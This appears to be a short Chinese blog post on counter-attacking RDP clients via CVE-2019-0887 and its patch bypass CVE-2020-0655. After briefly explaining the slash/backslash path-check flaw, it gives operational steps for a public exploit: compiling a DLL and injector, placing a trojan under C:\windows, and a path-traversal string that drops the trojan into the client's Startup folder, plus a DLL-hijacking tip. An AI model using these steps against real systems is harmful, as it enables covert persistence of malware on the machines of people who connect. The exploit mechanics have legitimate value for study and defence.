Windows RDP 反制
2023-02-24
2 min read
CVE-2022-21893
CVE-2022-24533
CVE-2020-0655
CVE-2020-0655 是 CVE-2019-0887补丁引发新漏洞
漏洞产生原因
在基于Unix的系统中,使用的路径分割字符是/,而在Windows系统中使用的是分割字符为\。但Windows最早是支持/和\的。因此,执行任何文件操作都会遇到这两个分隔符。研究人员发现的漏洞是一个检查的实现漏洞。许多核心Windows功能的开发人员可能忘记了Windows系统也支持/字符,所以会重新实现只支持\的文件路径逻辑。
CVE-2019-0887
项目地址:https://github.com/badboycxcc/CVE-2019-0887
编译CVE-2019-0887,重命名为winhlp.dll
编译 Install_Hook,重命名为hook.exe
- 小心,它们必须用 x64 编译
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # 木马
需要修改写入位置的话改下面配置文件
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
小提示:可以使用dll劫持
参考资料
- https://research.checkpoint.com/2019/reverse-rdp-the-hyper-v-connection/